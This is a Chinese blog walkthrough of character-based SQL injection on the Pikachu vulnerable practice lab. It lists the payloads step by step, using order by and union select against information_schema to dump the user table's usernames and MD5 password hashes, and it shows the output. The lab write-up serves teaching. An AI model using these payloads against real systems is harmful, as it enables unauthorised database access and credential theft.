pikachu 漏洞平台sql注入 之 字符型注入

在这里插入图片描述
首先判断一下是否有注入点 输入xx’ or 1=1 报错证明可以执行sql语句
在这里插入图片描述
输入 dasd’ or 1=1# 直接爆数据
在这里插入图片描述
dad’ order by 3#
fancy’ order by 2%23&submit=%E6%9F%A5%E8%AF%A2
%23就是#,由于在url中#有特殊含义所以要转义
原理和上一关一样,如果猜测的列数小于等于select语句查询结果的列数,会返回本关开始那张图,如果猜测的列数大于select语句查询结果的列数,会返回报错。

最终发现查询结果列数为2
在这里插入图片描述
判断出主查询字段数为2个
在这里插入图片描述
构造联合查询语句 union select database(),user()# 爆出数据库名和用户名
在这里插入图片描述
构造sql语句查询pikachu 中的表
eqe’union select table_schema,table_name from information_schema.tables where table_schema=‘pikachu’#
在这里插入图片描述

爆出的表中有个users 构造语句查一下
das’ union select table_name,column_name from information_schema.columns where table_name=‘users’#
在这里插入图片描述
爆出users 表中的敏感字段 构造语句 查下 username password 看看里面有没有重要内容
dasd’ union select username,password from users#
因为已经知道当前数据的很多信息了 查一下看看里面有什么
在这里插入图片描述
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e

your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd

your uid:test
your email is: e99a18c428cb38d5f260853678922e03 剩下就常规操作吧

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值